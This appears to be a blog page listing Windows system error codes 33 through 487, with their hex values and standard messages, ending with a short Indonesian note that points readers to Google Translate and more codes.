ERROR_LOCK_VIOLATION 33 (0×21) The process cannot access the file because another process has locked a portion of the file.
ERROR_WRONG_DISK 34 (0×22) The wrong diskette is in the drive. Insert %2 (Volume Serial Number: %3) into drive %1.
ERROR_SHARING_BUFFER_EXCEEDED 36 (0×24) Too many files opened for sharing.
ERROR_HANDLE_EOF 38 (0×26) Reached the end of the file.
ERROR_HANDLE_DISK_FULL 39 (0×27) The disk is full.
ERROR_NOT_SUPPORTED 50 (0×32) The request is not supported.
ERROR_REM_NOT_LIST 51 (0×33) Windows cannot find the network path. Verify that the network path is correct and the destination computer is not busy or turned off. If Windows still cannot find the network path, contact your network administrator.
ERROR_DUP_NAME 52 (0×34) You were not connected because a duplicate name exists on the network. If joining a domain, go to System in Control Panel to change the computer name and try again. If joining a workgroup, choose another workgroup name.
ERROR_BAD_NETPATH 53 (0×35) The network path was not found.
ERROR_NETWORK_BUSY 54 (0×36) The network is busy.
ERROR_DEV_NOT_EXIST 55 (0×37) The specified network resource or device is no longer available.
ERROR_TOO_MANY_CMDS 56 (0×38) The network BIOS command limit has been reached.
ERROR_ADAP_HDW_ERR 57 (0×39) A network adapter hardware error occurred.
ERROR_BAD_NET_RESP 58 (0x3A) The specified server cannot perform the requested operation.
ERROR_UNEXP_NET_ERR 59 (0x3B) An unexpected network error occurred.
ERROR_BAD_REM_ADAP 60 (0x3C) The remote adapter is not compatible.
ERROR_PRINTQ_FULL 61 (0x3D) The printer queue is full.
ERROR_NO_SPOOL_SPACE 62 (0x3E) Space to store the file waiting to be printed is not available on the server.
ERROR_PRINT_CANCELLED 63 (0x3F) Your file waiting to be printed was deleted.
ERROR_NETNAME_DELETED 64 (0×40) The specified network name is no longer available.
ERROR_NETWORK_ACCESS_DENIED 65 (0×41) Network access is denied.
ERROR_BAD_DEV_TYPE 66 (0×42) The network resource type is not correct.
ERROR_BAD_NET_NAME 67 (0×43) The network name cannot be found.
ERROR_TOO_MANY_NAMES 68 (0×44) The name limit for the local computer network adapter card was exceeded.
ERROR_TOO_MANY_SESS 69 (0×45) The network BIOS session limit was exceeded.
ERROR_SHARING_PAUSED 70 (0×46) The remote server has been paused or is in the process of being started.
ERROR_REQ_NOT_ACCEP 71 (0×47) No more connections can be made to this remote computer at this time because there are already as many connections as the computer can accept.
ERROR_REDIR_PAUSED 72 (0×48) The specified printer or disk device has been paused.
ERROR_FILE_EXISTS 80 (0×50) The file exists.
ERROR_CANNOT_MAKE 82 (0×52) The directory or file cannot be created.
ERROR_FAIL_I24 83 (0×53) Fail on INT 24.
ERROR_OUT_OF_STRUCTURES 84 (0×54) Storage to process this request is not available.
ERROR_ALREADY_ASSIGNED 85 (0×55) The local device name is already in use.
ERROR_INVALID_PASSWORD 86 (0×56) The specified network password is not correct.
ERROR_INVALID_PARAMETER 87 (0×57) The parameter is incorrect.
ERROR_NET_WRITE_FAULT 88 (0×58) A write fault occurred on the network.
ERROR_NO_PROC_SLOTS 89 (0×59) The system cannot start another process at this time.
ERROR_TOO_MANY_SEMAPHORES 100 (0×64) Cannot create another system semaphore.
ERROR_EXCL_SEM_ALREADY_OWNED 101 (0×65) The exclusive semaphore is owned by another process.
ERROR_SEM_IS_SET 102 (0×66) The semaphore is set and cannot be closed.
ERROR_TOO_MANY_SEM_REQUESTS 103 (0×67) The semaphore cannot be set again.
ERROR_INVALID_AT_INTERRUPT_TIME 104 (0×68) Cannot request exclusive semaphores at interrupt time.
ERROR_SEM_OWNER_DIED 105 (0×69) The previous ownership of this semaphore has ended.
ERROR_SEM_USER_LIMIT 106 (0x6A) Insert the diskette for drive %1.
ERROR_DISK_CHANGE 107 (0x6B) The program stopped because an alternate diskette was not inserted.
ERROR_DRIVE_LOCKED 108 (0x6C) The disk is in use or locked by another process.
ERROR_BROKEN_PIPE 109 (0x6D) The pipe has been ended.
ERROR_OPEN_FAILED 110 (0x6E) The system cannot open the device or file specified.
ERROR_BUFFER_OVERFLOW 111 (0x6F) The file name is too long.
ERROR_DISK_FULL 112 (0×70) There is not enough space on the disk.
ERROR_NO_MORE_SEARCH_HANDLES 113 (0×71) No more internal file identifiers available.
ERROR_INVALID_TARGET_HANDLE 114 (0×72) The target internal file identifier is incorrect.
ERROR_INVALID_CATEGORY 117 (0×75) The IOCTL call made by the application program is not correct.
ERROR_INVALID_VERIFY_SWITCH 118 (0×76) The verify-on-write switch parameter value is not correct.
ERROR_BAD_DRIVER_LEVEL 119 (0×77) The system does not support the command requested.
ERROR_CALL_NOT_IMPLEMENTED 120 (0×78) This function is not supported on this system.
ERROR_SEM_TIMEOUT 121 (0×79) The semaphore timeout period has expired.
ERROR_INSUFFICIENT_BUFFER 122 (0x7A) The data area passed to a system call is too small.
ERROR_INVALID_NAME 123 (0x7B) The filename, directory name, or volume label syntax is incorrect.
ERROR_INVALID_LEVEL 124 (0x7C) The system call level is not correct.
ERROR_NO_VOLUME_LABEL 125 (0x7D) The disk has no volume label.
ERROR_MOD_NOT_FOUND 126 (0x7E) The specified module could not be found.
ERROR_PROC_NOT_FOUND 127 (0x7F) The specified procedure could not be found.
ERROR_WAIT_NO_CHILDREN 128 (0×80) There are no child processes to wait for.
ERROR_CHILD_NOT_COMPLETE 129 (0×81) The %1 application cannot be run in Win32 mode.
ERROR_DIRECT_ACCESS_HANDLE 130 (0×82) Attempt to use a file handle to an open disk partition for an operation other than raw disk I/O.
ERROR_NEGATIVE_SEEK 131 (0×83) An attempt was made to move the file pointer before the beginning of the file.
ERROR_SEEK_ON_DEVICE 132 (0×84) The file pointer cannot be set on the specified device or file.
ERROR_IS_JOIN_TARGET 133 (0×85) A JOIN or SUBST command cannot be used for a drive that contains previously joined drives.
ERROR_IS_JOINED 134 (0×86) An attempt was made to use a JOIN or SUBST command on a drive that has already been joined.
ERROR_IS_SUBSTED 135 (0×87) An attempt was made to use a JOIN or SUBST command on a drive that has already been substituted.
ERROR_NOT_JOINED 136 (0×88) The system tried to delete the JOIN of a drive that is not joined.
ERROR_NOT_SUBSTED 137 (0×89) The system tried to delete the substitution of a drive that is not substituted.
ERROR_JOIN_TO_JOIN 138 (0x8A) The system tried to join a drive to a directory on a joined drive.
ERROR_SUBST_TO_SUBST 139 (0x8B) The system tried to substitute a drive to a directory on a substituted drive.
ERROR_JOIN_TO_SUBST 140 (0x8C) The system tried to join a drive to a directory on a substituted drive.
ERROR_SUBST_TO_JOIN 141 (0x8D) The system tried to SUBST a drive to a directory on a joined drive.
ERROR_BUSY_DRIVE 142 (0x8E) The system cannot perform a JOIN or SUBST at this time.
ERROR_SAME_DRIVE 143 (0x8F) The system cannot join or substitute a drive to or for a directory on the same drive.
ERROR_DIR_NOT_ROOT 144 (0×90) The directory is not a subdirectory of the root directory.
ERROR_DIR_NOT_EMPTY 145 (0×91) The directory is not empty.
ERROR_IS_SUBST_PATH 146 (0×92) The path specified is being used in a substitute.
ERROR_IS_JOIN_PATH 147 (0×93) Not enough resources are available to process this command.
ERROR_PATH_BUSY 148 (0×94) The path specified cannot be used at this time.
ERROR_IS_SUBST_TARGET 149 (0×95) An attempt was made to join or substitute a drive for which a directory on the drive is the target of a previous substitute.
ERROR_SYSTEM_TRACE 150 (0×96) System trace information was not specified in your CONFIG.SYS file, or tracing is disallowed.
ERROR_INVALID_EVENT_COUNT 151 (0×97) The number of specified semaphore events for DosMuxSemWait is not correct.
ERROR_TOO_MANY_MUXWAITERS 152 (0×98) DosMuxSemWait did not execute; too many semaphores are already set.
ERROR_INVALID_LIST_FORMAT 153 (0×99) The DosMuxSemWait list is not correct.
ERROR_LABEL_TOO_LONG 154 (0x9A) The volume label you entered exceeds the label character limit of the target file system.
ERROR_TOO_MANY_TCBS 155 (0x9B) Cannot create another thread.
ERROR_SIGNAL_REFUSED 156 (0x9C) The recipient process has refused the signal.
ERROR_DISCARDED 157 (0x9D) The segment is already discarded and cannot be locked.
ERROR_NOT_LOCKED 158 (0x9E) The segment is already unlocked.
ERROR_BAD_THREADID_ADDR 159 (0x9F) The address for the thread ID is not correct.
ERROR_BAD_ARGUMENTS 160 (0xA0) One or more arguments are not correct.
ERROR_BAD_PATHNAME 161 (0xA1) The specified path is invalid.
ERROR_SIGNAL_PENDING 162 (0xA2) A signal is already pending.
ERROR_MAX_THRDS_REACHED 164 (0xA4) No more threads can be created in the system.
ERROR_LOCK_FAILED 167 (0xA7) Unable to lock a region of a file.
ERROR_BUSY 170 (0xAA) The requested resource is in use.
ERROR_CANCEL_VIOLATION 173 (0xAD) A lock request was not outstanding for the supplied cancel region.
ERROR_ATOMIC_LOCKS_NOT_SUPPORTED 174 (0xAE) The file system does not support atomic changes to the lock type.
ERROR_INVALID_SEGMENT_NUMBER 180 (0xB4) The system detected a segment number that was not correct.
ERROR_INVALID_ORDINAL 182 (0xB6) The operating system cannot run %1.
ERROR_ALREADY_EXISTS 183 (0xB7) Cannot create a file when that file already exists.
ERROR_INVALID_FLAG_NUMBER 186 (0xBA) The flag passed is not correct.
ERROR_SEM_NOT_FOUND 187 (0xBB) The specified system semaphore name was not found.
ERROR_INVALID_STARTING_CODESEG 188 (0xBC) The operating system cannot run %1.
ERROR_INVALID_STACKSEG 189 (0xBD) The operating system cannot run %1.
ERROR_INVALID_MODULETYPE 190 (0xBE) The operating system cannot run %1.
ERROR_INVALID_EXE_SIGNATURE 191 (0xBF) Cannot run %1 in Win32 mode.
ERROR_EXE_MARKED_INVALID 192 (0xC0) The operating system cannot run %1.
ERROR_BAD_EXE_FORMAT 193 (0xC1) %1 is not a valid Win32 application.
ERROR_ITERATED_DATA_EXCEEDS_64k 194 (0xC2) The operating system cannot run %1.
ERROR_INVALID_MINALLOCSIZE 195 (0xC3) The operating system cannot run %1.
ERROR_DYNLINK_FROM_INVALID_RING 196 (0xC4) The operating system cannot run this application program.
ERROR_IOPL_NOT_ENABLED 197 (0xC5) The operating system is not presently configured to run this application.
ERROR_INVALID_SEGDPL 198 (0xC6) The operating system cannot run %1.
ERROR_AUTODATASEG_EXCEEDS_64k 199 (0xC7) The operating system cannot run this application program.
ERROR_RING2SEG_MUST_BE_MOVABLE 200 (0xC8) The code segment cannot be greater than or equal to 64K.
ERROR_RELOC_CHAIN_XEEDS_SEGLIM 201 (0xC9) The operating system cannot run %1.
ERROR_INFLOOP_IN_RELOC_CHAIN 202 (0xCA) The operating system cannot run %1.
ERROR_ENVVAR_NOT_FOUND 203 (0xCB) The system could not find the environment option that was entered.
ERROR_NO_SIGNAL_SENT 205 (0xCD) No process in the command subtree has a signal handler.
ERROR_FILENAME_EXCED_RANGE 206 (0xCE) The filename or extension is too long.
ERROR_RING2_STACK_IN_USE 207 (0xCF) The ring 2 stack is in use.
ERROR_META_EXPANSION_TOO_LONG 208 (0xD0) The global filename characters, * or ?, are entered incorrectly or too many global filename characters are specified.
ERROR_INVALID_SIGNAL_NUMBER 209 (0xD1) The signal being posted is not correct.
ERROR_THREAD_1_INACTIVE 210 (0xD2) The signal handler cannot be set.
ERROR_LOCKED 212 (0xD4) The segment is locked and cannot be reallocated.
ERROR_TOO_MANY_MODULES 214 (0xD6) Too many dynamic-link modules are attached to this program or dynamic-link module.
ERROR_NESTING_NOT_ALLOWED 215 (0xD7) Cannot nest calls to LoadModule.
ERROR_EXE_MACHINE_TYPE_MISMATCH 216 (0xD8) The version of %1 is not compatible with the version you’re running. Check your computer’s system information to see whether you need a x86 (32-bit) or x64 (64-bit) version of the program, and then contact the software publisher.
ERROR_EXE_CANNOT_MODIFY_SIGNED_BINARY 217 (0xD9) The image file %1 is signed, unable to modify.
ERROR_EXE_CANNOT_MODIFY_ STRONG_SIGNED_BINARY
218 (0xDA)
The image file %1 is strong signed, unable to modify.
ERROR_FILE_CHECKED_OUT 220 (0xDC) This file is checked out or locked for editing by another user.
ERROR_CHECKOUT_REQUIRED 221 (0xDD) The file must be checked out before saving changes.
ERROR_BAD_FILE_TYPE 222 (0xDE) The file type being saved or retrieved has been blocked.
ERROR_FILE_TOO_LARGE 223 (0xDF) The file size exceeds the limit allowed and cannot be saved.
ERROR_FORMS_AUTH_REQUIRED 224 (0xE0) Access Denied. Before opening files in this location, you must first add the web site to your trusted sites list, browse to the web site, and select the option to login automatically.
ERROR_VIRUS_INFECTED 225 (0xE1) Operation did not complete successfully because the file contains a virus.
ERROR_VIRUS_DELETED 226 (0xE2) This file contains a virus and cannot be opened. Due to the nature of this virus, the file has been removed from this location.
ERROR_PIPE_LOCAL 229 (0xE5) The pipe is local.
ERROR_BAD_PIPE 230 (0xE6) The pipe state is invalid.
ERROR_PIPE_BUSY 231 (0xE7) All pipe instances are busy.
ERROR_NO_DATA 232 (0xE8) The pipe is being closed.
ERROR_PIPE_NOT_CONNECTED 233 (0xE9) No process is on the other end of the pipe.
ERROR_MORE_DATA 234 (0xEA) More data is available.
ERROR_VC_DISCONNECTED 240 (0xF0) The session was canceled.
ERROR_INVALID_EA_NAME 254 (0xFE) The specified extended attribute name was invalid.
ERROR_EA_LIST_INCONSISTENT 255 (0xFF) The extended attributes are inconsistent.
WAIT_TIMEOUT 258 (0×102) The wait operation timed out.
ERROR_NO_MORE_ITEMS 259 (0×103) No more data is available.
ERROR_CANNOT_COPY 266 (0x10A) The copy functions cannot be used.
ERROR_DIRECTORY 267 (0x10B) The directory name is invalid.
ERROR_EAS_DIDNT_FIT 275 (0×113) The extended attributes did not fit in the buffer.
ERROR_EA_FILE_CORRUPT 276 (0×114) The extended attribute file on the mounted file system is corrupt.
ERROR_EA_TABLE_FULL 277 (0×115) The extended attribute table file is full.
ERROR_INVALID_EA_HANDLE 278 (0×116) The specified extended attribute handle is invalid.
ERROR_EAS_NOT_SUPPORTED 282 (0x11A) The mounted file system does not support extended attributes.
ERROR_NOT_OWNER 288 (0×120) Attempt to release mutex not owned by caller.
ERROR_TOO_MANY_POSTS 298 (0x12A) Too many posts were made to a semaphore.
ERROR_PARTIAL_COPY 299 (0x12B) Only part of a ReadProcessMemory or WriteProcessMemory request was completed.
ERROR_OPLOCK_NOT_GRANTED 300 (0x12C) The oplock request is denied.
ERROR_INVALID_OPLOCK_PROTOCOL 301 (0x12D) An invalid oplock acknowledgment was received by the system.
ERROR_DISK_TOO_FRAGMENTED 302 (0x12E) The volume is too fragmented to complete this operation.
ERROR_DELETE_PENDING 303 (0x12F) The file cannot be opened because it is in the process of being deleted.
ERROR_INCOMPATIBLE_WITH_GLOBAL _SHORT_NAME_REGISTRY_SETTING
304 (0×130)
Short name settings may not be changed on this volume due to the global registry setting.
ERROR_SHORT_NAMES_NOT_ENABLED_ON_VOLUME 305 (0×131) Short names are not enabled on this volume.
ERROR_SECURITY_STREAM_IS_INCONSISTENT 306 (0×132) The security stream for the given volume is in an inconsistent state. Please run CHKDSK on the volume.
ERROR_INVALID_LOCK_RANGE 307 (0×133) A requested file lock operation cannot be processed due to an invalid byte range.
ERROR_IMAGE_SUBSYSTEM_NOT_PRESENT 308 (0×134) The subsystem needed to support the image type is not present.
ERROR_NOTIFICATION_GUID_ALREADY_DEFINED 309 (0×135) The specified file already has a notification GUID associated with it.
ERROR_MR_MID_NOT_FOUND 317 (0x13D) The system cannot find message text for message number 0x%1 in the message file for %2.
ERROR_SCOPE_NOT_FOUND 318 (0x13E) The scope specified was not found.
ERROR_FAIL_NOACTION_REBOOT 350 (0x15E) No action was taken as a system reboot is required.
ERROR_FAIL_SHUTDOWN 351 (0x15F) The shutdown operation failed.
ERROR_FAIL_RESTART 352 (0×160) The restart operation failed.
ERROR_MAX_SESSIONS_REACHED 353 (0×161) The maximum number of sessions has been reached.
ERROR_THREAD_MODE_ALREADY_BACKGROUND 400 (0×190) The thread is already in background processing mode.
ERROR_THREAD_MODE_NOT_BACKGROUND 401 (0×191) The thread is not in background processing mode.
ERROR_PROCESS_MODE_ALREADY_BACKGROUND 402 (0×192) The process is already in background processing mode.
ERROR_PROCESS_MODE_NOT_BACKGROUND 403 (0×193) The process is not in background processing mode.
ERROR_INVALID_ADDRESS 487 (0x1E7) Attempt to access

Bagi yang masih pasif Bahasa Inggris anda dapat memanfaatkan fasilitas translete google..
Untuk COde Error yang lainnya bisa di lihat di sini :